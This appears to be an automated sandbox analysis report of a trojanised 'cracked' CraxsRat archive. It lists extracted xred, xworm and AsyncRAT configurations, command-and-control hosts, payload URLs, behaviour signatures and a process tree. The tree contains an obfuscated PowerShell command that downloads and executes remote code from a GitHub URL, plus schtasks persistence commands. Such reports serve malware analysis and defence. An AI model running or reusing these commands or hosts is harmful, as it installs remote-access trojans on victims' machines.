Analysis

  • max time kernel
    140s
  • max time network
    158s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-12-2024 05:07

General

  • Target

    Desktop.rar

  • Size

    234.9MB

  • MD5

    0ad213221885824bf128991b0295b56e

  • SHA1

    6c309febd5dfb98eb58076265fb76e6f24c68e7a

  • SHA256

    2066f3e0c9c4ccff79349f9aedfe041766304f08a8e0da981811e87a16832903

  • SHA512

    8b9bf6259f26214f0fb55ff22d2134f1b42baa312c684fbbce7a577fce38aa52b59d967ad4364e20309046af2c7bcc1e14f9ac7105c49e19f80329e4f916c6e8

  • SSDEEP

    3145728:EEtlRJD0+gmU7zbsNp55EaZkin0PeOO7WsS0ca+E3lNnZT25OH5kN4NQ908t24lh:ECaSdb0iR97vqaV3lNZykkRm0yP8SkR

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

xworm

C2

testloggbot23-37268.portmap.host:37268

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    2lz.exe

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

newstartagain.servequake.com:6606

newstartagain.servequake.com:7707

newstartagain.servequake.com:8808

newstartagain50.duckdns.org:6606

newstartagain50.duckdns.org:7707

newstartagain50.duckdns.org:8808

Mutex

Fm255Mv55doc

Attributes
  • delay

    3

  • install

    true

  • install_file

    System.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 1 IoCs
  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 24 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Desktop.rar"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2280
  • C:\Users\Admin\Desktop\ExtremeDumper-x86.exe
    "C:\Users\Admin\Desktop\ExtremeDumper-x86.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    PID:1216
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:4484
    • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe
      "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe" C:\Users\Admin\Desktop\ExtremeDumper.exe
      1⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Users\Admin\Desktop\._cache_CraxsRat.exe
        "C:\Users\Admin\Desktop\._cache_CraxsRat.exe" C:\Users\Admin\Desktop\ExtremeDumper.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3552
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3384
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd8
            4⤵
              PID:3912
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
              4⤵
                PID:888
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3148
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
                4⤵
                  PID:2328
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                  4⤵
                    PID:3852
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                    4⤵
                      PID:3432
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
                      4⤵
                        PID:852
                  • C:\ProgramData\Synaptics\Synaptics.exe
                    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:4752
                    • C:\Users\Admin\Desktop\._cache_Synaptics.exe
                      "C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:964
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools
                        4⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of WriteProcessMemory
                        PID:3232
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd8
                          5⤵
                            PID:2500
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2
                            5⤵
                              PID:4300
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4876
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8
                              5⤵
                                PID:1716
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                5⤵
                                  PID:1672
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                  5⤵
                                    PID:4652
                          • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                            "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            1⤵
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious use of SetWindowsHookEx
                            PID:764
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2532
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2552
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4308
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:3692
                                  • C:\Users\Admin\Desktop\ExtremeDumper.exe
                                    "C:\Users\Admin\Desktop\ExtremeDumper.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4520
                                    • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe
                                      "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3052
                                    • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe
                                      "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2604
                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe
                                    "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    • Modifies registry class
                                    PID:2276
                                    • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_CraxsRat.exe
                                      "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_CraxsRat.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:4852
                                      • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe
                                        "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:236
                                        • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe
                                          "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"
                                          4⤵
                                            PID:2872
                                        • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe
                                          "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"
                                          3⤵
                                            PID:3900
                                            • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe
                                              "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"
                                              4⤵
                                                PID:4688
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
                                                  5⤵
                                                    PID:5192
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
                                                      6⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:6140
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE351.tmp.bat""
                                                    5⤵
                                                      PID:5216
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout 3
                                                        6⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5744
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"
                                                  3⤵
                                                    PID:1764
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1080
                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe
                                                    "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"
                                                    3⤵
                                                      PID:3612
                                                      • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe
                                                        "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"
                                                        4⤵
                                                          PID:3860
                                                          • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe
                                                            "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"
                                                            5⤵
                                                              PID:1520
                                                              • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe
                                                                "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"
                                                                6⤵
                                                                  PID:2028
                                                              • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe
                                                                "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"
                                                                5⤵
                                                                  PID:2392
                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe
                                                                    "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"
                                                                    6⤵
                                                                      PID:336
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
                                                                        7⤵
                                                                          PID:6128
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
                                                                            8⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1872
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"
                                                                      5⤵
                                                                        PID:4508
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex
                                                                          6⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:3488
                                                                      • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe
                                                                        "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"
                                                                        5⤵
                                                                          PID:1848
                                                                          • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe
                                                                            "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"
                                                                            6⤵
                                                                              PID:2532
                                                                              • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe
                                                                                "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"
                                                                                7⤵
                                                                                  PID:1448
                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe
                                                                                    "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"
                                                                                    8⤵
                                                                                      PID:4724
                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe
                                                                                    "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"
                                                                                    7⤵
                                                                                      PID:4708
                                                                                      • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe
                                                                                        "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"
                                                                                        8⤵
                                                                                          PID:5464
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"
                                                                                        7⤵
                                                                                          PID:2596
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex
                                                                                            8⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:5204
                                                                                        • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe
                                                                                          "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"
                                                                                          7⤵
                                                                                            PID:3716
                                                                                            • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe
                                                                                              "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"
                                                                                              8⤵
                                                                                                PID:5232
                                                                                                • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe
                                                                                                  "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"
                                                                                                  9⤵
                                                                                                    PID:5524
                                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe
                                                                                                    "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"
                                                                                                    9⤵
                                                                                                      PID:5572
                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"
                                                                                                      9⤵
                                                                                                        PID:236
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex
                                                                                                          10⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:2944
                                                                                                      • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe
                                                                                                        "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"
                                                                                                        9⤵
                                                                                                          PID:1652
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools
                                                                                                          9⤵
                                                                                                            PID:3776
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd8
                                                                                                              10⤵
                                                                                                                PID:1960
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools
                                                                                                          7⤵
                                                                                                            PID:5384
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd8
                                                                                                              8⤵
                                                                                                                PID:5428
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools
                                                                                                          5⤵
                                                                                                            PID:2588
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd8
